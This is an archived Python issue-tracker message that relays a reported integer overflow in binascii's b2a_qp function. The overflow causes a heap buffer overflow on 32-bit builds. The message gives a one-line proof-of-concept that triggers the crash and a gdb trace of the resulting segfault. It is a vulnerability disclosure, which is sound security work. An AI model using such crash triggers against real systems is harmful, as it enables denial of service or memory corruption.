Message 272634 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	benjamin.peterson
Recipients	benjamin.peterson
Date	2016-08-14.01:32:24
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1471138346.27.0.267197396975.issue27760@psf.upfronthosting.co.za>
In-reply-to

Content
Thomas E Hybel reports: This vulnerability resides in /Modules/binascii.c in the function binascii_b2a_qp_impl. The problem is that the integer variable "odatalen" can overflow to become a small number. The function binascii_b2a_qp_impl qp-encodes binary data. First it computes the output string's length in the variable "odatalen": /* First, scan to see how many characters need to be encoded / in = 0; while (in < datalen) { if ((databuf[in] > 126) \|\| ... ) { ... odatalen += 3; in++; } ... } As we can see, each input character can result in more than three output-characters. Then we allocate the output string: odata = (unsigned char ) PyMem_Malloc(odatalen); And finally we encode the input-string and write the result into odata. If our string is so large that "odatalen" will wrap around and become a small number, then the odata buffer will be too small to hold the data. Our input is then copied into this too-small buffer. So the integer overflow results in a heap buffer overflow. Here's a proof-of-concept script: --- begin script --- import binascii binascii.b2a_qp(b"\x80"0x531dec0e) # this number gives odatalen=2 --- end script --- Note that this script assumes a 32-bit system where the "odatalen" variable will be 4 bytes wide. When run on Python-3.5.2, 32-bits, we get a segfault: (gdb) r ../poc3.py Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc3.py Breakpoint 1, binascii_b2a_qp_impl (module=module@entry=0xb7c370f4, data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0) at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1448 1448 odata = (unsigned char ) PyMem_Malloc(odatalen); (gdb) p odatalen $27 = 0x2 (gdb) p datalen $28 = 0x531dec0e (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "") at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333 1333 s[1] = "0123456789ABCDEF"[uvalue % 16]; (gdb) bt #0 0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "") at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333 #1 0xb7fd22fa in binascii_b2a_qp_impl (module=module@entry=0xb7c370f4, data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0) at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1476 #2 0xb7fd2510 in binascii_b2a_qp (module=module@entry=0xb7c370f4, args=args@entry=0xb7cbbb5c, kwargs=kwargs@entry=0x0) at /home/ubuntu32/python3/Python-3.5.2/Modules/clinic/binascii.c.h:510 #3 0x080e0ef4 in PyCFunction_Call (func=func@entry=0xb7c37534, args=args@entry=0xb7cbbb5c, kwds=kwds@entry=0x0) at Objects/methodobject.c:98

Thomas E Hybel reports:

This vulnerability resides in /Modules/binascii.c in the function
binascii_b2a_qp_impl. The problem is that the integer variable "odatalen" can
overflow to become a small number.

The function binascii_b2a_qp_impl qp-encodes binary data. First it computes the
output string's length in the variable "odatalen":

    /* First, scan to see how many characters need to be encoded */
    in = 0;
    while (in < datalen) {
        if ((databuf[in] > 126) || ... )
        {
            ...
            odatalen += 3;
            in++;
        }
        ...
    }

As we can see, each input character can result in more than three
output-characters. Then we allocate the output string:

    odata = (unsigned char *) PyMem_Malloc(odatalen);

And finally we encode the input-string and write the result into odata.

If our string is so large that "odatalen" will wrap around and become a small
number, then the odata buffer will be too small to hold the data. Our input is
then copied into this too-small buffer. So the integer overflow results in a
heap buffer overflow.

Here's a proof-of-concept script:

--- begin script ---

import binascii
binascii.b2a_qp(b"\x80"*0x531dec0e) # this number gives odatalen=2

--- end script ---

Note that this script assumes a 32-bit system where the "odatalen" variable will
be 4 bytes wide. When run on Python-3.5.2, 32-bits, we get a segfault:

(gdb) r ../poc3.py
Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc3.py

Breakpoint 1, binascii_b2a_qp_impl (module=module@entry=0xb7c370f4,
    data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1448
1448        odata = (unsigned char *) PyMem_Malloc(odatalen);
(gdb) p odatalen
$27 = 0x2
(gdb) p datalen
$28 = 0x531dec0e
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "")
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
1333        s[1] = "0123456789ABCDEF"[uvalue % 16];
(gdb) bt
#0  0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "")
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
#1  0xb7fd22fa in binascii_b2a_qp_impl (module=module@entry=0xb7c370f4,
    data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1476
#2  0xb7fd2510 in binascii_b2a_qp (module=module@entry=0xb7c370f4,
    args=args@entry=0xb7cbbb5c, kwargs=kwargs@entry=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/clinic/binascii.c.h:510
#3  0x080e0ef4 in PyCFunction_Call (func=func@entry=0xb7c37534,
    args=args@entry=0xb7cbbb5c, kwds=kwds@entry=0x0)
    at Objects/methodobject.c:98

History
Date	User	Action	Args
2016-08-14 01:32:26	benjamin.peterson	set	recipients: + benjamin.peterson
2016-08-14 01:32:26	benjamin.peterson	set	messageid: <1471138346.27.0.267197396975.issue27760@psf.upfronthosting.co.za>
2016-08-14 01:32:26	benjamin.peterson	link	issue27760 messages
2016-08-14 01:32:24	benjamin.peterson	create